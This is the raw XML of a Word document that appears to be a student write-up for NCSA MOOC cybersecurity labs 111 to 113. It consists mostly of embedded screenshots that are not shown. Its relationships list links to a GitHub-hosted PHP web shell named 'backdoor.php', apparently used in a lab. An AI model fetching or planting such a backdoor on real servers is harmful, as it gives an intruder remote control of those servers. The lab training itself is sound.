    <w:p w:rsidR="44BC3E0F" w:rsidP="6EBF35C9" w:rsidRDefault="44BC3E0F" w14:paraId="57A6F1C1" w14:textId="70B539D8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="44BC3E0F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="1FF1B32A" wp14:anchorId="4F12BBAB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>895350</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>142875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4210050" cy="5111033"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11777741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77774114" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4790831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10050" cy="511103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6EBF35C9" w:rsidR="43DB4C9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ชข</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="1E5E088C" w14:textId="50F40708">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="44BC3E0F" w:rsidP="44BC3E0F" w:rsidRDefault="44BC3E0F" w14:paraId="3F6F7B5B" w14:textId="452D0F3D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="51FF42BA" w14:textId="25473CA8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="5C30B6B5" w14:textId="06FAEC89">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="07D17ACA" w14:textId="5F8956AE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="10DECC51" w14:textId="4B4F3E15">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="00178C6C" w14:textId="044A6290">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="4A25485D" w14:textId="02A137B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="622F909F" w14:textId="767C026E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="6E2CBF12" w14:textId="2F1CD0CA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="497CC4C7" w14:textId="69EE1553">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="7DB0A002" w14:textId="15A51281">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="62B695BA" w14:textId="495122AE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="66B0050A" w14:textId="585D9DA4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="0F30B632" w14:textId="7927919B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="1EC62CFF" w14:textId="06F224F6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="473743E9" w14:textId="36BD3F3A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="2D3205B4" w14:textId="3AB35B63">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C70220F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="0C330BFD" wp14:anchorId="1D89EC1B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="1895475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="193087992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33042780" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId172265205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2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="41554F6E" w14:textId="55868DD7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="3D20C61C" w14:textId="454BCE9D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="7F1A3BE6" w14:textId="0FEA8115">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="7E6EEE6D" w14:textId="5CC4D4B3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="716AF150" w14:textId="47D3C7D6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="21777130" w14:textId="0D4FE218">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="2D93C030" w14:noSpellErr="1" w14:textId="5F5ED58E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1C57EB75">
        <w:rPr/>
        <w:t>https://play.mooc.ncsa.or.th/lab/113</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="13097604" w14:textId="2621FF53">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2C70220F">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ECF829C" wp14:editId="4BDAF326">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>666750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>133350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4481436" cy="3748894"/>
            <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="11225918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22591853" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId20005645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81436" cy="3748894"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:srgbClr val="0070c0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="243666DF" w14:textId="3126BE6D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="1811AB7F" w14:textId="76DE05FD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="0C52F6C8" w14:textId="6E51406B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="02521297" w14:textId="1B947F0E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2C70220F" w:rsidP="2C70220F" w:rsidRDefault="2C70220F" w14:paraId="7E23A4C0" w14:textId="19D8105A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="5E39042B" w14:textId="561E4B98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="30ACBC5F" w14:textId="44E3591E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="73843532" w14:textId="34151E35">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="269BD239" w14:textId="4F447BE5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="10FF774F" w14:textId="4AC62A08">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="4F0D2A38" w14:textId="3FF02E9E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="28273067" w14:textId="41318848">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2DCADB2A">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:editId="7919AF35" wp14:anchorId="55AF057D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>381000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>238125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4982460" cy="4295775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="11908097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90809703" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId143999609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82460" cy="4295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2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="43AB16DD" w14:textId="3D9D4050">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="0137235A" w14:textId="060573F5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="2C09460C" w14:textId="0E79FD89">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="5062743D" w14:textId="46732D5A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="76135DBF" w14:textId="3739ACE2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="6EC19277" w14:textId="1F9F5A5A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="162F7731" w14:textId="7C547C1C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2DCADB2A" w:rsidP="2DCADB2A" w:rsidRDefault="2DCADB2A" w14:paraId="662E434B" w14:noSpellErr="1" w14:textId="582A58FF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="52D3888C" w:rsidRDefault="52D3888C" w14:paraId="43851C7D" w14:textId="7B6A8047">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0E6378CA" w:rsidP="52D3888C" w:rsidRDefault="0E6378CA" w14:paraId="427CB3E0" w14:textId="0A694187">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0E6378CA">
        <w:drawing>
          <wp:inline wp14:editId="4FCC88BA" wp14:anchorId="6CBCF72E">
            <wp:extent cx="5943600" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10629831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62983114" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId178589665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7a9e3f9e503646f4"/>
      <w:footerReference w:type="default" r:id="Rb5dfc98d09c340a7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5B842D66" w:rsidTr="5B842D66" w14:paraId="472EF078">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="30E820EA" w14:textId="64F95926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5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="0E27459F" w14:textId="374C3F39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5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="0EF13741" w14:textId="7D0293D4">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="2F4794F8" w14:textId="619100C1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5B842D66" w:rsidTr="5B842D66" w14:paraId="66C1C1A4">
      <w:trPr>
        <w:trHeight w:val="300"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="5E9142AB" w14:textId="51F177D3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5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="443E0386" w14:textId="7508F6CF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5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="6933CE42" w14:textId="46725225">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="5B842D66" w:rsidP="5B842D66" w:rsidRDefault="5B842D66" w14:paraId="5C55EAF1" w14:textId="782B368D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ABC6D6B"/>
    <w:rsid w:val="02F672CC"/>
    <w:rsid w:val="0BC22F21"/>
    <w:rsid w:val="0C4FBEE9"/>
    <w:rsid w:val="0E6378CA"/>
    <w:rsid w:val="0E8CF541"/>
    <w:rsid w:val="124DD1BE"/>
    <w:rsid w:val="174C3CA1"/>
    <w:rsid w:val="1C57EB75"/>
    <w:rsid w:val="23C298E4"/>
    <w:rsid w:val="279B316D"/>
    <w:rsid w:val="2AB30B53"/>
    <w:rsid w:val="2C371C4C"/>
    <w:rsid w:val="2C70220F"/>
    <w:rsid w:val="2DCADB2A"/>
    <w:rsid w:val="3304A194"/>
    <w:rsid w:val="381A1AA4"/>
    <w:rsid w:val="43DB4C9F"/>
    <w:rsid w:val="44BC3E0F"/>
    <w:rsid w:val="4C617019"/>
    <w:rsid w:val="50EAEFC5"/>
    <w:rsid w:val="52D3888C"/>
    <w:rsid w:val="543D6189"/>
    <w:rsid w:val="56F4C0C1"/>
    <w:rsid w:val="5B842D66"/>
    <w:rsid w:val="5BDC4D0C"/>
    <w:rsid w:val="69B062B6"/>
    <w:rsid w:val="6EBF35C9"/>
    <w:rsid w:val="7ABC6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BC6D6B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C9003774-4ABA-4F4A-AC50-5F17C2BB589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Header">
    <w:uiPriority w:val="99"/>
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="5B842D66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5B842D66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440401742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header.xml" Id="R7a9e3f9e503646f4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer.xml" Id="Rb5dfc98d09c340a7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/111" TargetMode="External" Id="R85bb7de4b1a8438b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="rId407124412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="rId94440532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="rId1506599717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="rId1874293657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.mooc.ncsa.or.th/lab/112" TargetMode="External" Id="Rfebb20e78e2049cb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="rId479083142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="rId1722652050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="rId2000564582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="rId1439996090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="rId1785896655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/materaj2/simplephpshell/master/backdoor.php" TargetMode="External" Id="R181c4021c43e404e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="rId1448429182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="rId78980727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25C6366E7A76F4984B3A5A6504322E9" ma:contentTypeVersion="14" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="aae77042f5a1f4aca2c1849db70f2ff6">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d533f0fc-f163-477f-8acf-134549be1267" xmlns:ns3="98adb9b5-38eb-425a-885a-e7a61ef25c68" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="0b7c111eef281580fe8d60d0869af1d0" ns2:_="" ns3:_="">
    <xsd:import namespace="d533f0fc-f163-477f-8acf-134549be1267"/>
    <xsd:import namespace="98adb9b5-38eb-425a-885a-e7a61ef25c6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533f0fc-f163-477f-8acf-134549be126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79c6419b-ba21-413d-80ff-ef762860b97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8adb9b5-38eb-425a-885a-e7a61ef25c68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fd8ca457-1ef6-424d-87ae-e33ef425153b}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="98adb9b5-38eb-425a-885a-e7a61ef25c6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533f0fc-f163-477f-8acf-134549be1267">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="98adb9b5-38eb-425a-885a-e7a61ef25c68" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6ADEF006-F9B8-46C2-BD2C-A7542CAE30F1}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{183D6ACA-6988-4F52-8729-0829B52A8923}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EB9EFE46-BF83-427A-98F6-A4B32CD3EC88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Sirasak SUWANNAKOED</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>aphiwit bunlom</lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-16T08:26:55.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-23T11:04:14.6061412Z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0x010100425C6366E7A76F4984B3A5A6504322E9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>